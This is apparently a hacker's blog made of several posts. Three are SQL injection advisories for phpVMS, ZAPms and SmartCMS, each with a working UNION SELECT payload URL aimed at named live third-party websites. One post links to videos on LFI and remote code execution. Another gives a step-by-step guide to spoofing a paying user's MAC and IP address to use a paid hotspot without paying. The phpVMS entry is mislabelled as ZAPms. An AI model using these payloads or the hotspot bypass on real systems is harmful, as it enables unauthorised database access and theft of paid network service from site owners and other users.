[o] phpVMS Virtual Airline Administration <= SQL Injection Vulnerability

Software : ZAPms
Version   : 2.1.934 & 2.1.935
Vendor   : http://www.phpvms.net
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]


[o] PoC

 http://vupscargo.com/index.php/PopUpNews/popupnewsitem/?itemid=43+union+select+1,version(),database(),4,user()--
http://malaysiava.org/index.php/PopUpNews/popupnewsitem/?itemid=12+union+select+1,version(),database(),4,user()--

[o] ZAPms <= SQL Injection Vulnerability

Software : ZAPms
Version   : 1.41
Vendor   : http://www.zapms.de/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/products?pid=[SQLi]


[o] PoC

 http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product

Hei you out there... :)

It's been a long time since my last post..
Well i've been busy with many things and i have a daughter now (6 month). Very beautiful and smart daughter (like her father of course! hahahaha..). We call her "amora". :D


[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartMS
Version   : n/a
Vendor   : http://smartcms.nl/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://www.smartcms.nl/cms2/sites/1010/index.php?idx=566+AND+1=2+UNION+ALL+SELECT+database()--
http://www.pokey.nl/cms2/sites/1086/index.php?idx=3397+AND+1=2+UNION+ALL+SELECT+version()--
http://www.devriesenrijke.nl/cms2/sites/1077/index.php?idx=2605+AND+1=2+UNION+ALL+SELECT+user()--

berhubung web tempat naroh video2 ku dah matek jadi pindah kesini aje yee.. :))


e107
http://www.mediafire.com/?w7y52uhfb8p8cky

LFI (/proc/self/environ)
http://www.mediafire.com/?nw77hl1350fl4dx

CGI to RCE
http://www.mediafire.com/?4e9th8sdfccbphn

Upload Form (/proc/self/environ)
http://www.mediafire.com/?jwl7r2aqm3zy5mb


video yang lain na nyusul ntar.. ^^

It's been two month since my last post.. lol
Well.. I just wanna share my experience with hotspot and bypass trick. Hope you all like it.

I have connected to the hotspot but i can't do shit.
Can't browsing, searching and download. sucks!





If i want to use the internet connection, i have to buy their internet voucher then they will give me username and password.



I don't have money.. So let's improvise a lil bit.. :)

Now we are connected to the hotspot.


[+] Collect hotspot and users information

Open NetCut and you will see all users that connected to that hotspot.



Click "Print Table".

This is our mac and IP address right now.
[20:6A:8A:3D:F1:15] 192.168.200.241 noge

This is the mac and IP address that we will use to bypass.
[00:1A:80:EE:EE:E0] 192.168.200.151



OK now we have mac and IP address.
Let's see the gateway and DNS server.




[+] Change Mac and IP address

Disable your interface.



Click your interface again and choose "Properties"



Change mac address by clicking "Configure..."



Select "Advanced" tab.
Our mac address is in "Local Administration MAC Network Address" (maybe with different name in other computer).



Change mac Value with mac address that we scan before 00:1A:80:EE:EE:E0 without ":" and click OK.



Click your interface and choose "Properties" again.



Select Internet Protocol (TCP/IP) and click "Properties".



Select "Use the following IP Address" and fill the form with IP address

that we scan before. Click "OK" and "Close".



Now we have change our mac and IP address.
Let's Enable interface and connect to hotspot again.



Our mac and IP address has changed.



Try browsing...



Walaaa!! Don't have to pay for the connection.. ^^




./NoGe